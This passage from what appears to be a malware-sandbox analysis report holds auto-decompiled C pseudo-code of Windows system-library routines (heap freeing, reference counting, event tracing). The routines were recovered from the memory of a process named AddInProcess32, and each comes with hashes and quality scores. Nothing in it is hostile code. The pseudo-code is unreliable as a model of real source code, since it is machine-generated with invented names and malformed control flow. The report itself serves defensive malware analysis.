                              										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                              										__eflags =  *((char*)(_t99 + 0xe5));
                              										if(__eflags != 0) {
                              											E019288F5(0x19485ec, _t85, 0x1945388, _t99, _t102, __eflags);
                              										} else {
                              											__eflags =  *((char*)(_t99 + 0xe4));
                              											if( *((char*)(_t99 + 0xe4)) == 0) {
                              												 *((char*)(_t99 + 0xe4)) = 1;
                              												_push(_t99);
                              												_push( *((intOrPtr*)(_t99 + 0x24)));
                              												E0189AFD0();
                              											}
                              											while(1) {
                              												_t71 = _t99 + 8;
                              												 *(_t104 - 0x2c) = _t71;
                              												_t80 =  *_t71;
                              												_t95 = _t71[1];
                              												 *(_t104 - 0x28) = _t80;
                              												 *(_t104 - 0x24) = _t95;
                              												while(1) {
                              													L19:
                              													__eflags = _t95;
                              													if(_t95 == 0) {
                              														break;
                              													}
                              													_t102 = _t80;
                              													 *(_t104 - 0x30) = _t95;
                              													 *(_t104 - 0x24) = _t95 - 1;
                              													asm("lock cmpxchg8b [edi]");
                              													_t80 = _t102;
                              													 *(_t104 - 0x28) = _t80;
                              													 *(_t104 - 0x24) = _t95;
                              													__eflags = _t80 - _t102;
                              													_t99 =  *(_t104 + 8);
                              													if(_t80 != _t102) {
                              														continue;
                              													} else {
                              														__eflags = _t95 -  *(_t104 - 0x30);
                              														if(_t95 !=  *(_t104 - 0x30)) {
                              															continue;
                              														} else {
                              															__eflags = _t95;
                              															if(_t95 != 0) {
                              																_t74 = 0;
                              																 *(_t104 - 0x34) = 0;
                              																_t102 = 0;
                              																__eflags = 0;
                              																while(1) {
                              																	 *(_t104 - 0x3c) = _t102;
                              																	__eflags = _t102 - 3;
                              																	if(_t102 >= 3) {
                              																		break;
                              																	}
                              																	__eflags = _t74;
                              																	if(_t74 != 0) {
                              																		L49:
                              																		_t102 =  *_t74;
                              																		__eflags = _t102;
                              																		if(_t102 != 0) {
                              																			_t102 =  *(_t102 + 4);
                              																			__eflags = _t102;
                              																			if(_t102 != 0) {
                              																				 *0x194b1e0(_t74, _t99);
                              																				 *_t102();
                              																			}
                              																		}
                              																		do {
                              																			_t71 = _t99 + 8;
                              																			 *(_t104 - 0x2c) = _t71;
                              																			_t80 =  *_t71;
                              																			_t95 = _t71[1];
                              																			 *(_t104 - 0x28) = _t80;
                              																			 *(_t104 - 0x24) = _t95;
                              																			goto L19;
                              																		} while (_t74 == 0);
                              																		goto L49;
                              																	} else {
                              																		_t82 = 0;
                              																		__eflags = 0;
                              																		while(1) {
                              																			 *(_t104 - 0x38) = _t82;
                              																			__eflags = _t82 -  *0x19484c0;
                              																			if(_t82 >=  *0x19484c0) {
                              																				break;
                              																			}
                              																			__eflags = _t74;
                              																			if(_t74 == 0) {
                              																				_t77 = E01929063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                              																				__eflags = _t77;
                              																				if(_t77 == 0) {
                              																					_t74 = 0;
                              																					__eflags = 0;
                              																				} else {
                              																					_t74 = _t77 + 0xfffffff4;
                              																				}
                              																				 *(_t104 - 0x34) = _t74;
                              																				_t82 = _t82 + 1;
                              																				continue;
                              																			}
                              																			break;
                              																		}
                              																		_t102 = _t102 + 1;
                              																		continue;
                              																	}
                              																	goto L20;
                              																}
                              																__eflags = _t74;
                              															}
                              														}
                              													}
                              													break;
                              												}
                              												L20:
                              												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                              												 *((char*)(_t99 + 0xe5)) = 1;
                              												 *((char*)(_t104 - 0x1d)) = 1;
                              												goto L21;
                              											}
                              										}
                              										L21:
                              										 *(_t104 - 4) = 0xfffffffe;
                              										E0185922A(_t99);
                              										_t64 = E01877D50();
                              										__eflags = _t64;
                              										if(_t64 != 0) {
                              											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              										} else {
                              											_t67 = 0x7ffe0386;
                              										}
                              										__eflags =  *_t67;
                              										if( *_t67 != 0) {
                              											_t67 = E01928B58(_t99);
                              										}
                              										__eflags =  *((char*)(_t104 - 0x1d));
                              										if( *((char*)(_t104 - 0x1d)) != 0) {
                              											__eflags = _t99 -  *0x19486c0; // 0x12e07b0
                              											if(__eflags != 0) {
                              												__eflags = _t99 -  *0x19486b8; // 0x0
                              												if(__eflags == 0) {
                              													_t94 = 0x19486bc;
                              													_t87 = 0x19486b8;
                              													goto L27;
                              												} else {
                              													__eflags = _t67 | 0xffffffff;
                              													asm("lock xadd [edi], eax");
                              													if(__eflags == 0) {
                              														E01859240(_t80, _t99, _t99, _t102, __eflags);
                              													}
                              												}
                              											} else {
                              												_t94 = 0x19486c4;
                              												_t87 = 0x19486c0;
                              												L27:
                              												E01889B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                              											}
                              										}
                              									} else {
                              										goto L13;
                              									}
                              								}
                              							}
                              						}
                              						return E018AD130(_t80, _t99, _t102);
                              					} else {
                              						 *_t51 = 0x1945388;
                              						 *((intOrPtr*)(_t51 + 4)) = _t84;
                              						 *_t84 = _t51;
                              						 *0x194538c = _t51;
                              						goto L6;
                              					}
                              				}
                              			}





















                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: faf50d86fad0d708723b2f7636ca5ca874faedbbe895bf722c301d56a4ad0e1b
                              • Instruction ID: 77b16df5bb9ea849e851c72cf22b6855c9b83ac81e32a23a1a952d1c8f0e099a
                              • Opcode Fuzzy Hash: faf50d86fad0d708723b2f7636ca5ca874faedbbe895bf722c301d56a4ad0e1b
                              • Instruction Fuzzy Hash: 8301AFB2A05604CFD3259F1CD840B22BBFAEB85729F264466EA05CB692C774DE41CBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E018EC450(intOrPtr* _a4) {
                              				signed char _t25;
                              				intOrPtr* _t26;
                              				intOrPtr* _t27;
                              
                              				_t26 = _a4;
                              				_t25 =  *(_t26 + 0x10);
                              				if((_t25 & 0x00000003) != 1) {
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push( *((intOrPtr*)(_t26 + 8)));
                              					_push(0);
                              					_push( *_t26);
                              					E01899910();
                              					_t25 =  *(_t26 + 0x10);
                              				}
                              				if((_t25 & 0x00000001) != 0) {
                              					_push(4);
                              					_t7 = _t26 + 4; // 0x4
                              					_t27 = _t7;
                              					_push(_t27);
                              					_push(5);
                              					_push(0xfffffffe);
                              					E018995B0();
                              					if( *_t27 != 0) {
                              						_push( *_t27);
                              						E018995D0();
                              					}
                              				}
                              				_t8 = _t26 + 0x14; // 0x14
                              				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                              					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                              				}
                              				_push( *_t26);
                              				E018995D0();
                              				return L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                              			}







                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                              • Instruction ID: 923b7095daf24341ed4aa1c1cee8267dc487003eab192a1bda987a4d39ade157
                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                              • Instruction Fuzzy Hash: CC019671140506BFEB21AF6DCC84E63FB7DFF55395F044529F21492560C721EDA1C6A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E01924015(signed int __eax, signed int __ecx) {
                              				void* __ebx;
                              				void* __edi;
                              				signed char _t10;
                              				signed int _t28;
                              
                              				_push(__ecx);
                              				_t28 = __ecx;
                              				asm("lock xadd [edi+0x24], eax");
                              				_t10 = (__eax | 0xffffffff) - 1;
                              				if(_t10 == 0) {
                              					_t1 = _t28 + 0x1c; // 0x1e
                              					E01872280(_t10, _t1);
                              					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                              					E01872280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x19486ac);
                              					E0185F900(0x19486d4, _t28);
                              					E0186FFB0(0x19486ac, _t28, 0x19486ac);
                              					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                              					E0186FFB0(0, _t28, _t1);
                              					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                              					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                              						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                              					}
                              					_t10 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                              				}
                              				return _t10;
                              			}








                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 25b4fb5285e94ee2a8248beac308b5a2fe763d69fe8d2174571a0c014d448d09
                              • Instruction ID: 6f02921d2d2a9362b85df4f48d8b95f81ce2579a508eaa25b65cc887664a077b
                              • Opcode Fuzzy Hash: 25b4fb5285e94ee2a8248beac308b5a2fe763d69fe8d2174571a0c014d448d09
                              • Instruction Fuzzy Hash: 1E018F72241A467FD751AB6DCE84E13F7ACFF95760B000229F608C3A11DB24ED51C6E5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 61%
                              			E0191138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				short _v54;
                              				char _v60;
                              				void* __edi;
                              				void* __esi;
                              				signed char* _t21;
                              				intOrPtr _t27;
                              				intOrPtr _t33;
                              				intOrPtr _t34;
                              				signed int _t35;
                              
                              				_t32 = __edx;
                              				_t27 = __ebx;
                              				_v8 =  *0x194d360 ^ _t35;
                              				_t33 = __edx;
                              				_t34 = __ecx;
                              				E0189FA60( &_v60, 0, 0x30);
                              				_v20 = _a4;
                              				_v16 = _a8;
                              				_v28 = _t34;
                              				_v24 = _t33;
                              				_v54 = 0x1033;
                              				if(E01877D50() == 0) {
                              					_t21 = 0x7ffe0388;
                              				} else {
                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              				}
                              				_push( &_v60);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t21 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                              			}


















                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 91a57ad33b494e4854b868e734f9abb4a26208709db45db83d972df6d85280a2
                              • Instruction ID: 746d45c5a574761fbfd50b0d29045112f8527f68e52ee27e6821da0d4f2fc2ee
                              • Opcode Fuzzy Hash: 91a57ad33b494e4854b868e734f9abb4a26208709db45db83d972df6d85280a2
                              • Instruction Fuzzy Hash: 4F019E71A0120CAFCB14DFACD841EAEBBB8EF44710F04406AF904EB280EA74DA41CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 61%
                              			E019114FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				short _v54;
                              				char _v60;
                              				void* __edi;
                              				void* __esi;
                              				signed char* _t21;
                              				intOrPtr _t27;
                              				intOrPtr _t33;
                              				intOrPtr _t34;
                              				signed int _t35;
                              
                              				_t32 = __edx;
                              				_t27 = __ebx;
                              				_v8 =  *0x194d360 ^ _t35;
                              				_t33 = __edx;
                              				_t34 = __ecx;
                              				E0189FA60( &_v60, 0, 0x30);
                              				_v20 = _a4;
                              				_v16 = _a8;
                              				_v28 = _t34;
                              				_v24 = _t33;
                              				_v54 = 0x1034;
                              				if(E01877D50() == 0) {
                              					_t21 = 0x7ffe0388;
                              				} else {
                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              				}
                              				_push( &_v60);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t21 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7364fc42ca72c21a7710eecae6e28755b03b2d8e41d837bd9a37f1e3593070cb
                              • Instruction ID: 8ca86ae5530437835ffe24e2bef5f479bcbec5d6bd4cca6c8d812f2ceb277e8e
                              • Opcode Fuzzy Hash: 7364fc42ca72c21a7710eecae6e28755b03b2d8e41d837bd9a37f1e3593070cb
                              • Instruction Fuzzy Hash: 50019E71A0124CAFCB14DFACD845EAEBBB8EF44710F04406AFA04EB280DA74DA40CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E018558EC(intOrPtr __ecx) {
                              				signed int _v8;
                              				char _v28;
                              				char _v44;
                              				char _v76;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr _t10;
                              				intOrPtr _t16;
                              				intOrPtr _t17;
                              				intOrPtr _t27;
                              				intOrPtr _t28;
                              				signed int _t29;
                              
                              				_v8 =  *0x194d360 ^ _t29;
                              				_t10 =  *[fs:0x30];
                              				_t27 = __ecx;
                              				if(_t10 == 0) {
                              					L6:
                              					_t28 = 0x1835c80;
                              				} else {
                              					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                              					if(_t16 == 0) {
                              						goto L6;
                              					} else {
                              						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                              					}
                              				}
                              				if(E01855943() != 0 &&  *0x1945320 > 5) {
                              					E018D7B5E( &_v44, _t27);
                              					_t22 =  &_v28;
                              					E018D7B5E( &_v28, _t28);
                              					_t11 = E018D7B9C(0x1945320, 0x183bf15,  &_v28, _t22, 4,  &_v76);
                              				}
                              				return E0189B640(_t11, _t17, _v8 ^ _t29, 0x183bf15, _t27, _t28);
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6cdc581d83c044b9daca3b9632bd06c438381026fc5d651556c7f9b942c430dc
                              • Instruction ID: b81e22ceb9ef4ade1684e51f46f9434bdcc8add327c327ead129c790fba8d71b
                              • Opcode Fuzzy Hash: 6cdc581d83c044b9daca3b9632bd06c438381026fc5d651556c7f9b942c430dc
                              • Instruction Fuzzy Hash: 66018F31A00209DBDB14EB6DE8009BEB7B8EB85374F590069AE05DB244DE24DF06C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0186B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                              				signed char _t11;
                              				signed char* _t12;
                              				intOrPtr _t24;
                              				signed short* _t25;
                              
                              				_t25 = __edx;
                              				_t24 = __ecx;
                              				_t11 = ( *[fs:0x30])[0x50];
                              				if(_t11 != 0) {
                              					if( *_t11 == 0) {
                              						goto L1;
                              					}
                              					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                              					L2:
                              					if( *_t12 != 0) {
                              						_t12 =  *[fs:0x30];
                              						if((_t12[0x240] & 0x00000004) == 0) {
                              							goto L3;
                              						}
                              						if(E01877D50() == 0) {
                              							_t12 = 0x7ffe0385;
                              						} else {
                              							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                              						}
                              						if(( *_t12 & 0x00000020) == 0) {
                              							goto L3;
                              						}
                              						return E018D7016(_a4, _t24, 0, 0, _t25, 0);
                              					}
                              					L3:
                              					return _t12;
                              				}
                              				L1:
                              				_t12 = 0x7ffe0384;
                              				goto L2;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                              • Instruction ID: 2613b85628caad3085a6cf6e6c15386d8b6dabfa4fe1c21319141c8cb9168908
                              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                              • Instruction Fuzzy Hash: 08018472301684DFE327C71CC988F667FDCEB85758F0900A1FA15CB651D629DE40C622
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E01921074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                              				char _v8;
                              				void* _v11;
                              				unsigned int _v12;
                              				void* _v15;
                              				void* __esi;
                              				void* __ebp;
                              				char* _t16;
                              				signed int* _t35;
                              
                              				_t22 = __ebx;
                              				_t35 = __ecx;
                              				_v8 = __edx;
                              				_t13 =  !( *__ecx) + 1;
                              				_v12 =  !( *__ecx) + 1;
                              				if(_a4 != 0) {
                              					E0192165E(__ebx, 0x1948ae4, (__edx -  *0x1948b04 >> 0x14) + (__edx -  *0x1948b04 >> 0x14), __edi, __ecx, (__edx -  *0x1948b04 >> 0x14) + (__edx -  *0x1948b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                              				}
                              				E0191AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                              				if(E01877D50() == 0) {
                              					_t16 = 0x7ffe0388;
                              				} else {
                              					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              				}
                              				if( *_t16 != 0) {
                              					_t16 = E0190FE3F(_t22, _t35, _v8, _v12);
                              				}
                              				return _t16;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5af9a1a306f152a9b8fe1a720ff3e0aa257b8f8f8033c18154054827cd4cbbf4
                              • Instruction ID: e82c3f958cdf76eb6f4022e3f66282c7f80c990aab4c24221d45d58c7861da88
                              • Opcode Fuzzy Hash: 5af9a1a306f152a9b8fe1a720ff3e0aa257b8f8f8033c18154054827cd4cbbf4
                              • Instruction Fuzzy Hash: E6014C726447429FC711DF69C844F1A7BD9BBC4310F048529F98983695EE34D950CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 59%
                              			E0190FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				signed int _v12;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				short _v58;
                              				char _v64;
                              				void* __edi;
                              				void* __esi;
                              				signed char* _t18;
                              				intOrPtr _t24;
                              				intOrPtr _t30;
                              				intOrPtr _t31;
                              				signed int _t32;
                              
                              				_t29 = __edx;
                              				_t24 = __ebx;
                              				_v12 =  *0x194d360 ^ _t32;
                              				_t30 = __edx;
                              				_t31 = __ecx;
                              				E0189FA60( &_v64, 0, 0x30);
                              				_v24 = _a4;
                              				_v32 = _t31;
                              				_v28 = _t30;
                              				_v58 = 0x266;
                              				if(E01877D50() == 0) {
                              					_t18 = 0x7ffe0388;
                              				} else {
                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              				}
                              				_push( &_v64);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t18 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 42eaeabc40a73958d0b6f86b1ba5ada05eea243c512181ed49a97ec725888c3f
                              • Instruction ID: a9b198140a03ff78a15986e00f4e124f4dff5bdab69843797273ee1122a7c2be
                              • Opcode Fuzzy Hash: 42eaeabc40a73958d0b6f86b1ba5ada05eea243c512181ed49a97ec725888c3f
                              • Instruction Fuzzy Hash: 9D018471E01209AFDB14DBADD845FAEBBB8EF54710F04406AFA04EB280EA74DA01C7D5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 59%
                              			E0190FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				signed int _v12;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				short _v58;
                              				char _v64;
                              				void* __edi;
                              				void* __esi;
                              				signed char* _t18;
                              				intOrPtr _t24;
                              				intOrPtr _t30;
                              				intOrPtr _t31;
                              				signed int _t32;
                              
                              				_t29 = __edx;
                              				_t24 = __ebx;
                              				_v12 =  *0x194d360 ^ _t32;
                              				_t30 = __edx;
                              				_t31 = __ecx;
                              				E0189FA60( &_v64, 0, 0x30);
                              				_v24 = _a4;
                              				_v32 = _t31;
                              				_v28 = _t30;
                              				_v58 = 0x267;
                              				if(E01877D50() == 0) {
                              					_t18 = 0x7ffe0388;
                              				} else {
                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              				}
                              				_push( &_v64);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t18 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61005088e2fd0c4718075ec5c0077e24bd4acfedb44cebfdf677da45463d6700
                              • Instruction ID: f0d55f54b9a6ca301ae11f56a8f77d8dfc2578a7eea7b77e886f2cc0fee2f94e
                              • Opcode Fuzzy Hash: 61005088e2fd0c4718075ec5c0077e24bd4acfedb44cebfdf677da45463d6700
                              • Instruction Fuzzy Hash: 8201B171A04209AFCB24DBA8D805EAEBBF8EF40B04F044066B900EB280DA34AA00C795
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 54%
                              			E01928A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                              				signed int _v12;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				short _v66;
                              				char _v72;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed char* _t18;
                              				signed int _t32;
                              
                              				_t29 = __edx;
                              				_v12 =  *0x194d360 ^ _t32;
                              				_t31 = _a8;
                              				_t30 = _a12;
                              				_v66 = 0x1c20;
                              				_v40 = __ecx;
                              				_v36 = __edx;
                              				_v32 = _a4;
                              				_v28 = _a8;
                              				_v24 = _a12;
                              				if(E01877D50() == 0) {
                              					_t18 = 0x7ffe0386;
                              				} else {
                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v72);
                              				_push(0x14);
                              				_push(0x20402);
                              				_push( *_t18 & 0x000000ff);
                              				return E0189B640(E01899AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 246b6b9965c28447844aaf859190b79e887453905d4ce96ef6439f8fdbcadece
                              • Instruction ID: fcd0d968d09fda6336386b8de0ab9278f8a60c051bcac7a3de463395e8751ff3
                              • Opcode Fuzzy Hash: 246b6b9965c28447844aaf859190b79e887453905d4ce96ef6439f8fdbcadece
                              • Instruction Fuzzy Hash: B2012C75A0121DAFCB04DFADD941DAEBBF8EF58710F14405AF904E7341EA34AA00CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 54%
                              			E01928ED6(intOrPtr __ecx, intOrPtr __edx) {
                              				signed int _v8;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				short _v62;
                              				char _v68;
                              				signed char* _t29;
                              				intOrPtr _t35;
                              				intOrPtr _t41;
                              				intOrPtr _t42;
                              				signed int _t43;
                              
                              				_t40 = __edx;
                              				_v8 =  *0x194d360 ^ _t43;
                              				_v28 = __ecx;
                              				_v62 = 0x1c2a;
                              				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                              				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                              				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                              				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                              				_v24 = __edx;
                              				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                              				if(E01877D50() == 0) {
                              					_t29 = 0x7ffe0386;
                              				} else {
                              					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v68);
                              				_push(0x1c);
                              				_push(0x20402);
                              				_push( *_t29 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                              			}



















                              Memory Dump Source
